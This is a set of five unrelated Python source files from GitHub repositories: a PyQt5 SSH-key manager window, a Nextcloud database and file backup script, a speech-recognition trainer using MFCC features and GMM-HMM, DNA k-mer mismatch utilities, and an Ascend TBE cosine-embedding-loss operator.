+{"seq_id":"39289985298","text":"from PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nimport sys\n\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\nfrom cloud_management import get_user_ssh, delete_ssh\n\nsshlist = {'Name': 'name', 'Public Key': 'public_key', 'Cloud': 'cloud_name', 'id': 'id', 'Cloud id': 'cloud_id'}\n\n\nclass ShowSSHUi(QtWidgets.QMainWindow):\n def __init__(self, user_id: int = None):\n super(ShowSSHUi, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('show_ssh.ui', self) # Load the .ui file\n self.user_id = user_id\n self.back = self.findChild(QtWidgets.QPushButton, 'bt_back')\n self.back.clicked.connect(self.backButtonPressed)\n\n self.edit = self.findChild(QtWidgets.QPushButton, 'edit')\n self.edit.clicked.connect(self.update_buttonPressed)\n\n self.create = self.findChild(QtWidgets.QPushButton, 'create')\n self.create.clicked.connect(self.createButtonPressed)\n\n self.delete = self.findChild(QtWidgets.QPushButton, 'delete_2')\n self.delete.clicked.connect(self.deleteButtonPressed)\n # todo maryam action titlesh pak nashode\n self.ssh_list = self.findChild(QtWidgets.QTableWidget, 'tableWidget')\n self.ssh_list.setColumnHidden(3, True) # column 3 is cloud id\n self.ssh_list.setColumnHidden(4, True) # column 4 is id\n self.create_table()\n\n def create_table(self):\n sshs = get_user_ssh(user_id=self.user_id)\n self.ssh_list.setRowCount(len(sshs))\n count = 0\n for ssh in sshs:\n for key, value in ssh.items():\n headercount = self.ssh_list.columnCount()\n m = key\n for x in range(0, headercount, 1):\n headertext = self.ssh_list.horizontalHeaderItem(x).text()\n if m == sshlist[headertext]:\n self.tableWidget.setItem(count, x, QTableWidgetItem(str(value)))\n count += 1\n\n def update_buttonPressed(self):\n row = self.ssh_list.currentItem().row()\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id,ssh_id=int(self.ssh_list.item(row, 4).text()))\n self.OtherWindow.show()\n self.close()\n\n def createButtonPressed(self):\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n def deleteButtonPressed(self):\n row = self.ssh_list.currentItem().row()\n delete_ssh(int(self.ssh_list.item(row, 4).text()))\n self.create_table()\n\n # todo if press back button back to dashboard\n def backButtonPressed(self):\n # if id=admin ->show all SSHs\n # from admin_dashboard import AdminDashboardUi\n # self.OtherWindow = AdminDashboardUi()\n # self.OtherWindow.show()\n # self.close()\n\n # if id=customer -> show just SSHs of customer\n from ui.dashboard import DashboardUi\n self.OtherWindow = DashboardUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n\n def get_value(object):\n if isinstance(object, QtWidgets.QComboBox):\n value = object.itemData(object.currentIndex())\n if isinstance(object, QtWidgets.QTextEdit):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QTextBrowser):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QLabel):\n value = object.text()\n if isinstance(object, QtWidgets.QSpinBox):\n value = object.value()\n if isinstance(object, QtWidgets.QDoubleSpinBox):\n value = object.value()\n return value\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # Create an instance of QtWidgets.QApplication\n window = ShowSSHUi(19) # Create an instance of our class\n window.show()\n sys.exit(app.exec_()) # Start the application\n\n\nif __name__ == 
\"__main__\":\n main()\n# todo maryam oon id ro hide kon actiono bardar\n# todo maryam safeyehaye manage ro pak kon kolan\n","repo_name":"vidagharavian/cloud_service","sub_path":"ui/show_ssh.py","file_name":"show_ssh.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33433532497","text":"from deployments import BasicRsyncBackup, client\nfrom deployments import user_config\nfrom os.path import dirname, abspath, join\nfrom datetime import datetime\nfrom sys import argv\n\n\nclass BackupNextcloud(BasicRsyncBackup):\n \"\"\"Backup the database and files for the nextcloud service.\"\"\"\n\n backup_dir = \"/backup/nextcloud\"\n source_dir = join(dirname(abspath(__file__)), \"mounts\", \"webroot\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize variables that are dynamic.\"\"\"\n super().__init__(*args, **kwargs)\n self.now = int(datetime.now().strftime(r\"%s\"))\n self.stage = join(self.backup_dir, \"staging\", str(self.now))\n self.container = client.containers.list(\n filters={'name': 'nextcloud_database_1'}\n )[0] # throws an exception if the container isn't running.\n\n def do_backup(self, *args, **kwargs):\n \"\"\"Override to add extra steps.\"\"\"\n self.prep_folder(self.backup_dir)\n self.prep_folder(self.stage)\n self.backup_database()\n super().do_backup(*args, **kwargs)\n\n def backup_database(self):\n \"\"\"Get a dump from the database and store it in the staging area.\"\"\"\n dump_result = self.container.exec_run(\n \"mysqldump -u nextcloud --password='%s' nextcloud\"\n % user_config['database']\n )\n if dump_result.exit_code:\n raise ValueError(\n \"The mysqldump command returned %d. The command output:\\n%s\"\n % (int(dump_result.exit_code), dump_result.output)\n )\n with open(join(self.stage, \"database.dump\"), 'w') as dumpfile:\n dumpfile.write(dump_result.output.decode())\n\n\ndef main():\n \"\"\"The main entrypoint of the backup script if it's run alone.\"\"\"\n if \"--no-cronjob\" in argv:\n # setup cron job\n freq = False\n else:\n if '--freq=hourly' in argv:\n freq = 'hourly'\n if '--freq=weekly' in argv:\n freq = 'weekly'\n if '--freq=monthly' in argv:\n freq = 'monthly'\n else:\n freq = 'daily'\n backup = BackupNextcloud(freq, abspath(__file__))\n backup.do_backup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dscottboggs/Deployments","sub_path":"deployments/nextcloud/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71471417768","text":"import numpy as np\r\nfrom scipy.fftpack import dct\r\nimport scipy.io.wavfile\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport hashlib\r\nimport re\r\nfrom hmmlearn import hmm\r\nimport pickle\r\nimport math\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nfrom prettytable import PrettyTable\r\nfrom prettytable import PLAIN_COLUMNS\r\ndef get_features(file_path, pre_emphasis = 0.95, frame_size = 0.025, frame_step = 0.01, NFFT = 512,\\\r\n nfilt = 26, low_freq_hz = 300, num_ceps = 13): \r\n \"\"\"\r\n Args:\r\n file_path: File path of the data sample.\r\n pre_emphasis: filter coefficient for pre emphasis phase.\r\n frame_size: size of the frames in framing phase.\r\n frame_step: size of the overlap in framing phase.\r\n NFFT: point numbers of discrete Fourier Transform (DFT).\r\n nfilt: number of filters used in filter Banks calulation phase.\r\n low_freq_hz: lower frequency used in filter Banks calulation phase.\r\n num_ceps: number of Cepstral Coefficients. \r\n\r\n Returns:\r\n numpy array, of features: MFFCCs and delta coefficients.\r\n \"\"\"\r\n sample_rate, signal = scipy.io.wavfile.read(file_path)\r\n #sample_rate = 16000 \r\n \r\n #Preemphasis\r\n signal = np.append(signal[0], signal[1:] - pre_emphasis * signal[: -1])\r\n #plotSignal(time, signal)\r\n\r\n #Framing\r\n signal_length = len(signal)\r\n frame_length = int(frame_size * sample_rate)\r\n step_length = int(frame_step * sample_rate)\r\n\r\n\r\n num_frames = int(np.ceil(float(np.abs(signal_length-frame_length))/step_length))+1\r\n \r\n pad_signal_length = (frame_length + num_frames * step_length) - signal_length\r\n pad_signal = np.zeros(pad_signal_length)\r\n signal = np.append(signal,pad_signal)\r\n\r\n indices_matrix = np.tile(np.arange(0,frame_length),(num_frames,1))\r\n offset_indices = np.arange(0,step_length*num_frames,step_length)\r\n indices_matrix = (indices_matrix[0:].T + (offset_indices[0:])).T\r\n frames = signal[indices_matrix.astype(np.int32, copy=False)]\r\n\r\n #Windowing\r\n #Explicit implementation:\r\n #w = np.arange(0,frame_length)\r\n #w = 0.54 - 0.46 * np.cos((2 * np.pi * w) / (frame_length - 1))\r\n #frames*=w\r\n \r\n frames *= np.hamming(frame_length)\r\n \r\n \r\n #Discrete Fourier Transformation\r\n magnitude_frames = np.absolute(np.fft.rfft(frames, NFFT))\r\n \r\n #Power spectrum\r\n pow_frames = (magnitude_frames ** 2) / NFFT\r\n \r\n #Compute energy\r\n energy = np.sum(pow_frames, axis = 1)\r\n\r\n #Filter Banks\r\n # nfilt = filters number\r\n # low_freq_hz = 300 usually default is 0 (set to 300 for discard too low frequency,\\\r\n # likely generated from noise)\r\n highfreq = sample_rate / 2\r\n low_freq_mel = (2595 * np.log10(1 + low_freq_hz / 700.)) # Convert Hz to Mel\r\n high_freq_mel = (2595 * np.log10(1 + highfreq / 700.)) # Convert Hz to Mel\r\n\r\n mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2 ) # Equally spaced in Mel scale\r\n hz_points = (700 * (10** (mel_points / 2595.0) - 1 )) # Convert Mel to Hz\r\n \r\n #hz_points 28 gia tri : 300 -> 8000\r\n bin = np.floor((NFFT + 1) * hz_points / sample_rate) # our points are in Hz, but we use fft bins,\\\r\n # so we have to conver from Hz to fft bin number\r\n # print(bin)\r\n # [ 9. 12. 15. 18. 21. 25. 29. 33. 38. 43. 49. 54. 61. 68.\r\n #75. 84. 93. 102. 113. 124. 136. 150. 164. 180. 196. 215. 235. 
256.]\r\n fbank = np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\n #fbank.size=6682\r\n \r\n for j in range(0,nfilt):\r\n for i in range(int(bin[j]), int(bin[j+1])):\r\n fbank[j,i] = (i - bin[j]) / (bin[j+1]-bin[j])\r\n for i in range(int(bin[j+1]), int(bin[j+2])):\r\n fbank[j,i] = (bin[j+2]-i) / (bin[j+2]-bin[j+1])\r\n \r\n # Plot filterbank if you want \r\n #plotFilterbank(fbank) \r\n # print(pow_frames[0].size)\r\n filter_banks = np.dot(pow_frames, fbank.T)\r\n \r\n filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # if energy is zero, we get problems with log\r\n \r\n filter_banks = np.log10(filter_banks) # dB\r\n \r\n #Mel Frequency Cepstral Coefficients\r\n mfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 0:(num_ceps)] # Keep 0 to num_ceps-1\r\n \r\n mfcc[:, 0] = np.log(energy + 1e-8) # the zeroth cepstral coefficient is replaced with the log of\\\r\n # the total frame energy\r\n\r\n\r\n cep_lifter = 22\r\n (nframes, ncoeff) = mfcc.shape\r\n n = np.arange(ncoeff)\r\n lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n mfcc *= lift \r\n\r\n #Mean normalization \r\n filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\n mfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\n #Delta compute\r\n N = 2\r\n num_frames = mfcc.shape[0]\r\n \r\n denominator = 2 * sum([n**2 for n in range(1, N+1)])\r\n \r\n delta_feat = np.empty_like(mfcc)\r\n delta_feat2 = np.empty_like(mfcc)\r\n padded = np.pad(mfcc, ((N, N), (0, 0)), mode='edge') # padded version of feature vectors(mfcc) (appending N*2 rows)\r\n # print(mfcc[1])\r\n # print(padded[1])\r\n for t in range(num_frames):\r\n delta_feat[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]\r\n # print(np.arange(-N, N+1)[0 : 5])\r\n #Append mfcc and Delta features\r\n features = np.append(mfcc, delta_feat, axis = 1)\r\n padded = np.pad(delta_feat, ((N, N), (0, 0)), mode='edge')\r\n for t in range(num_frames):\r\n delta_feat2[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator\r\n features = np.append(features, delta_feat2, axis = 1) \r\n # print(features.size)\r\n return features\r\ndef main() :\r\n train_dict_word = {}\r\n test_dict_word = {}\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/features/data_train\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for txt in file:\r\n if(re.match('.*\\.txt$',txt)):\r\n file_path = (os.path.join(root_dir, txt))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = np.loadtxt(\"Dataset/features/data_train/\"+label+\"/\"+txt,delimiter=', ')\r\n labels_list.append(label)\r\n features_list.append(feature)\r\n \r\n words = np.unique(labels_list)\r\n \"\"\"\r\n Split 85% for training and 15% for test\r\n \"\"\"\r\n training_features = features_list\r\n training_labels = labels_list\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/data/data_set\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for wave in file:\r\n \r\n if(re.match('.*\\.wav$',wave)):\r\n file_path = (os.path.join(root_dir, wave))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = get_features(file_path)\r\n labels_list.append(label)\r\n features_list.append(feature) \r\n test_features = features_list\r\n test_labels = labels_list \r\n for i in range(len(training_features)):\r\n if training_labels[i] not in train_dict_word:\r\n 
train_dict_word[training_labels[i]] = []\r\n train_dict_word[training_labels[i]].append(training_features[i])\r\n else:\r\n train_dict_word[training_labels[i]].append(training_features[i]) \r\n for i in range(len(test_features)):\r\n if test_labels[i] not in test_dict_word:\r\n test_dict_word[test_labels[i]] = []\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n else:\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n #Train dataset\r\n\r\n GMMHMM_models_word = {} # dict of HMMs (one model for each word into the dataset)\r\n num_states = 3 # States number of HMM\r\n num_mix = 2 # number of mixtures for each hidden state\r\n covariance_type = 'diag' # covariance type\r\n num_iter = 10 # number of max iterations\r\n bakis_level = 2\r\n\r\n start_prob = np.zeros(num_states) # start probability prior\r\n start_prob[0:bakis_level - 1] = 1 / float(1 / (bakis_level - 1))\r\n\r\n trans_mat = np.eye(num_states) # transaction matrix probability prior \r\n for i in range(num_states - (bakis_level - 1)):\r\n for j in range(bakis_level):\r\n trans_mat[i, i + j] = 1 / bakis_level\r\n\r\n for i in range((num_states - (bakis_level ) + 1), num_states ):\r\n trans_mat[i,i:] = (1 / (num_states - i))\r\n\r\n\r\n model_number = 0\r\n for word in train_dict_word:\r\n model = hmm.GMMHMM(n_components = num_states, n_mix = num_mix, startprob_prior = start_prob,\\\r\n transmat_prior = trans_mat, covariance_type = covariance_type,\\\r\n n_iter = num_iter, verbose=False)\r\n\r\n train_samples = train_dict_word[word]\r\n length_samples = np.zeros(len(train_samples), dtype=np.int) \r\n for elem in range(len(train_samples)):\r\n length_samples[elem] = train_samples[elem].shape[0]\r\n \r\n train_samples = np.vstack(train_samples) # Stack arrays in train_samples in sequence vertically \r\n\r\n \r\n \r\n \r\n \r\n #model.fit(train_samples, length_samples) # MODEL FIT\r\n model.fit(train_samples)\r\n \r\n GMMHMM_models_word[word] = model\r\n print(\"Finish train model GMM-HMM %s\" % model_number)\r\n model_number += 1\r\n num_words = len(train_dict_word)\r\n print(\"Finish train %s GMM-HMMs for %s different words\" % (num_words, num_words))\r\n\r\n\r\n trained_model_word = GMMHMM_models_word\r\n\r\n print(\"\")\r\n\r\n #Test data\r\n\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for speech_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for word_model in trained_model_word.keys():\r\n model = trained_model_word[word_model]\r\n score = model.score(speech_word)\r\n score_models[word_model] = score\r\n predict_word = max(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n #euclid\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for test_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for train_model in train_dict_word.keys():\r\n feature_train = train_dict_word[train_model]\r\n #print(feature_train[0][0][0])\r\n dem = 0\r\n score = 0;\r\n for sample in feature_train :\r\n total = 0\r\n for i in range(len(sample)):\r\n euclid = 0\r\n for j in range(39):\r\n euclid= euclid + 
(test_word[i][j]-sample[i][j])**2\r\n euclid = math.sqrt(euclid)\r\n total = total + euclid\r\n score = score+total \r\n \r\n # print(score)\r\n #10/99/24\r\n score_models[train_model] = score\r\n predict_word = min(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n \r\n\r\nmain()","repo_name":"xuanthuan0502/recognize_speech","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14194367428","text":"\n\nfrom collections import defaultdict\nfrom itertools import combinations, product\n\n\ndef reverse_complement_dna(dna):\n\t'''Returns the reverse complement of the given DNA strand.'''\n\tintab = \"ATCG\"\n\touttab = \"TAGC\"\n\ttrantab = dna.maketrans(intab,outtab)\n\treverse_complement = dna.translate(trantab)\n\treturn reverse_complement[::-1]\n\n\ndef ImmediateNeighbors(Pattern):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tnucleotides = [\"A\",\"C\",\"G\",\"T\"]\n\tfor i in range(0,len(Pattern)):\n\t\tsymbol = Pattern[i]\n\t\tfor nucleotide in nucleotides:\n\t\t\tif symbol != nucleotide:\n\t\t\t\tNeighbor = Pattern[:i] + nucleotide + Pattern[(i+1):]\n\t\t\t\tNeighborhood.append(Neighbor)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef IterativeNeighbors(Pattern, d):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tfor j in range(0,d):\n\t\tfor String in Neighborhood:\n\t\t\tNeighborhood = Neighborhood + ImmediateNeighbors(Pattern)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef kmer_mismatches(kmer, d):\n \"\"\"Returns all k-mers that are within d mismatches of the given k-mer.\"\"\"\n mismatches = [kmer] # Initialize mismatches with the k-mer itself (i.e. d=0).\n alt_bases = {'A':'CGT', 'C':'AGT', 'G':'ACT', 'T':'ACG'}\n for dist in range(1, d+1):\n for change_indices in combinations(range(0,len(kmer)), dist):\n for substitutions in product(*[alt_bases[kmer[i]] for i in change_indices]):\n new_mistmatch = list(kmer)\n for idx, sub in zip(change_indices, substitutions):\n new_mistmatch[idx] = sub\n mismatches.append(''.join(new_mistmatch))\n return mismatches\n\ndef FrequentWords_with_mm_and_rc(string,k,d):\n\t\"\"\"Returns all most frequent k-mers with up to d mismatches in the dna sequence seq.\"\"\"\n\t# Frequency analysis so we don't generate mismatches for the same k-mer more than once.\n\tfreqMap = defaultdict(int)\n\tfor i in range(0,((len(string)-k)+1)):\n\t\tfreqMap[string[i:i+k]] += 1\n\t\tfreqMap[reverse_complement_dna(string[i:k+i])] += 1\n\n\tmismatch_count = defaultdict(int)\n\tfor pattern, freq in freqMap.items():\n\t\tfor mismatch in IterativeNeighbors(pattern,d):\n\t\t\tmismatch_count[mismatch] += freq\n\n\tm = max(mismatch_count.values())\n\tfrequent_patterns = sorted([pattern for pattern, count in mismatch_count.items() if count == m])\n\treturn frequent_patterns\n\n\nwith open(\"input_3.txt\") as file:\n\tdata = file.readlines()\n\tstring = data[0].strip()\n\tnumbers = data[1].strip().split(\" \")\n\n\nprint(numbers)\nprint(string)\n\nPatterns = FrequentWords_with_mm_and_rc(string,int(numbers[0]),int(numbers[1]))\nprint(*Patterns,sep=\" \")","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"FrequentWordsMismatchesReverseComplement.py","file_name":"FrequentWordsMismatchesReverseComplement.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8643401786","text":"from functools import reduce\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te import platform as cceconf\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\ndef _shape_check(shape_x1, shape_x2, shape_tgt):\n # check whether the shape meets the broadcast requirements, and output broadcast shape\n try:\n _, _, x_shape = util.produce_shapes(shape_x1, shape_x2)\n except RuntimeError:\n raise RuntimeError(\"x1 and x2 can't be broadcast\")\n\n x_shape_reduce = x_shape[:]\n x_shape_reduce.pop(1)\n try:\n _, _, tgt_shape = util.produce_shapes(x_shape_reduce, shape_tgt)\n except RuntimeError:\n raise RuntimeError(\"x and target can't be broadcast\")\n min_dim = min(len(shape_x1), len(shape_x2), len(shape_tgt))\n if min_dim >= 3:\n reduce_dim = -1\n for i in range(-1, -min_dim, -1):\n if(shape_x1[i] == shape_x2) or (\n shape_x1[i] == shape_tgt[i]):\n reduce_dim = i\n else:\n break\n if reduce_dim != -1:\n shape_x1 = list(shape_x1[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x1[reduce_dim:])]\n shape_x2 = list(shape_x2[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x2[reduce_dim:])]\n shape_tgt = list(shape_tgt[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_tgt[reduce_dim:])]\n x_shape = list(x_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, x_shape[reduce_dim:])]\n tgt_shape = list(tgt_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, tgt_shape[reduce_dim:])]\n util.check_shape_rule(shape_x1)\n util.check_shape_rule(shape_x2)\n util.check_shape_rule(shape_tgt)\n util.check_tensor_shape_size(shape_x1)\n util.check_tensor_shape_size(shape_x2)\n util.check_tensor_shape_size(shape_tgt)\n\n return x_shape, tgt_shape, shape_x1, shape_x2, shape_tgt\n\n\ndef _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction):\n # cast_to not support \"int16\", \"int64\", ISA not support float64(double)\n x_check_list = [\"int8\", \"uint8\", \"int32\", \"float16\", \"float32\"]\n if not input_dtype_x1 in x_check_list:\n raise RuntimeError(\"x1 dtype %s not support\" % input_dtype_x1)\n if not input_dtype_x2 in x_check_list:\n raise RuntimeError(\"x2 dtype %s not support\" % input_dtype_x2)\n\n # cast_to not support \"int16\", \"int64\", \"uint8\" can't indicate -1\n tgt_check_list = [\"int8\", \"int32\", \"float16\", \"float32\"]\n if not target_dtype in tgt_check_list:\n raise RuntimeError(\"target dtype %s not support\" % target_dtype)\n\n reduce_check_list = ['mean', 'sum', 'none']\n if reduction not in reduce_check_list:\n raise RuntimeError(\"reduction method not support\")\n\n\n# pylint: disable=locally-disabled,unused-argument,invalid-name\n@fusion_manager.register(\"cosine_embedding_loss\")\ndef cosine_embedding_loss_compute(x1, x2, target, output_y, x_shape_broadcat,\n tgt_shape_broadcast, margin=0,\n reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n DSL description of the cosine_embedding_loss operator's calculation process\n\n Parameters\n ----------\n x1: TVM tensor\n the placeholder of x1 input data\n x2: TVM tensor\n the placeholder of x2 input data\n target: TVM tensor\n the placeholder of target input data\n output_y: TVM tensor\n the placeholder of beta output data\n x_shape_broadcat: list,\n x1 and x2 broadcast shape\n tgt_shape_broadcast: list\n x and target broadcast shape\n margin: float\n margin, default value is \"0.0\"\n reduction: str\n string indicate reduce method, default value is 
\"mean\"\n kernel_name: str\n cce kernel name, default value is \"group_norm\"\n\n Returns\n -------\n res: TVM tensor\n \"\"\"\n cce_plat = cceconf.get_soc_spec('SOC_VERSION')\n cast_dtype = 'float32'\n epsilon = tvm.const(1e-12, dtype=\"float32\")\n\n if cce_plat == 'Ascend310':\n cast_dtype = 'float16'\n epsilon = tvm.const(5e-8, dtype=\"float16\")\n\n if x1.dtype.lower() != cast_dtype and x1.dtype.lower() != 'float32':\n x1 = te.lang.cce.cast_to(x1, cast_dtype)\n\n if x2.dtype.lower() != cast_dtype and x2.dtype.lower() != 'float32':\n x2 = te.lang.cce.cast_to(x2, cast_dtype)\n\n target = te.lang.cce.cast_to(target, x1.dtype)\n\n x1_broadcast = te.lang.cce.broadcast(x1, x_shape_broadcat)\n x2_broadcast = te.lang.cce.broadcast(x2, x_shape_broadcat)\n target_broadcast = te.lang.cce.broadcast(target, tgt_shape_broadcast)\n\n # DSL description for cosine similarity compute\n prod = te.lang.cce.vmul(x1_broadcast, x2_broadcast)\n\n mag1 = te.lang.cce.vmul(x1_broadcast, x1_broadcast)\n mag2 = te.lang.cce.vmul(x2_broadcast, x2_broadcast)\n mag_square1 = te.lang.cce.sum(mag1, axis=1)\n mag_square2 = te.lang.cce.sum(mag2, axis=1)\n\n x1_epsilon = te.lang.cce.vadds(mag_square1, epsilon)\n x2_epsilon = te.lang.cce.vadds(mag_square2, epsilon)\n x1_sqrt = te.lang.cce.vsqrt(x1_epsilon)\n x2_sqrt = te.lang.cce.vsqrt(x2_epsilon)\n mode_num = te.lang.cce.vmul(x1_sqrt, x2_sqrt)\n prod_num = te.lang.cce.sum(prod, axis=1)\n cos_res = te.lang.cce.vdiv(prod_num, mode_num)\n\n # DSL description for 1 - cos(x1, x2)\n zero_tensor = te.lang.cce.vmuls(target_broadcast, 0)\n one_tensor = te.lang.cce.vadds(zero_tensor, 1)\n\n neg_one_tensor = te.lang.cce.vsub(zero_tensor, one_tensor)\n pos = te.lang.cce.vsub(one_tensor, cos_res)\n\n # DSL description for max(0, cos(x1, x2) - margin)\n margin_const = tvm.const(margin, dtype=\"float32\")\n margin_tensor = te.lang.cce.vmuls(one_tensor, margin_const)\n neg_sub = te.lang.cce.vsub(cos_res, margin_tensor)\n neg = te.lang.cce.vmax(zero_tensor, neg_sub)\n\n # DSL description for output = pos if y == 1 else neg\n output_pos = te.lang.cce.vcmpsel(target_broadcast, one_tensor, 'eq',\n pos, zero_tensor)\n output_neg = te.lang.cce.vcmpsel(target_broadcast, neg_one_tensor, 'eq',\n neg, zero_tensor)\n res = te.lang.cce.vadd(output_pos, output_neg)\n if reduction in ['sum', 'mean']:\n if reduction == 'mean':\n num = reduce(lambda x, y: x * y, tgt_shape_broadcast)\n mean_cof = num ** (-1)\n res = te.lang.cce.vmuls(res, mean_cof)\n res = te.lang.cce.cast_to(res, 'float32')\n\n reduce_axis = [index for index, _ in enumerate(tgt_shape_broadcast)]\n res_sum = te.lang.cce.sum(res, axis=reduce_axis)\n return res_sum\n\n return te.lang.cce.cast_to(res, 'float32')\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\n@util.check_input_type(dict, dict, dict, dict, float, str, str)\ndef cosine_embedding_loss(input_x1, input_x2, target, y,\n margin=0, reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n algorithm: cosine_embedding_loss\n cosine embedding loss = // 1-cos(x1, x2), if y == 1\n \\\\ max(0, cos(x1, x2) - margin), if y == -1\n Note that the size of 5D Tensors are defined by \"NC1HWC0\".\n The input tensor's dimension C should be equal.\n\n Parameters\n ----------\n x1: dict\n dict of input x1, A Tensor for input data.\n x2: dict\n dict of input x1, A Tensor for input data.\n target: dict\n dict of target, A Tensor for target, include 1 and -1.\n output_y: dict\n dict of output, A Tensor for output\n margin: float\n float of margin, A float 
number subtracted when y == -1\n reduction: str\n str of output reduce method.\n kernel_name: str\n kernel name, default value is \"cosine_embedding_loss\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x1 = input_x1.get(\"shape\")\n dtype_x1 = input_x1.get(\"dtype\")\n input_dtype_x1 = dtype_x1.lower()\n shape_x2 = input_x2.get(\"shape\")\n dtype_x2 = input_x2.get(\"dtype\")\n input_dtype_x2 = dtype_x2.lower()\n shape_tgt = target.get(\"shape\")\n dtype_tgt = target.get(\"dtype\")\n target_dtype = dtype_tgt.lower()\n\n util.check_kernel_name(kernel_name)\n x_shape_broadcat, tgt_shape_broadcast, shape_x1, shape_x2, shape_tgt = \\\n _shape_check(shape_x1, shape_x2, shape_tgt)\n _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction)\n\n data_input1 = tvm.placeholder(shape_x1, name=\"data_input1\",\n dtype=input_dtype_x1)\n data_input2 = tvm.placeholder(shape_x2, name=\"data_input2\",\n dtype=input_dtype_x2)\n data_target = tvm.placeholder(shape_tgt, name=\"data_target\",\n dtype=target_dtype)\n\n res = cosine_embedding_loss_compute(data_input1, data_input2, data_target,\n y, x_shape_broadcat,\n tgt_shape_broadcast, margin, reduction,\n kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input1, data_input2, data_target, res],\n }\n\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/cosine_embedding_loss.py","file_name":"cosine_embedding_loss.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
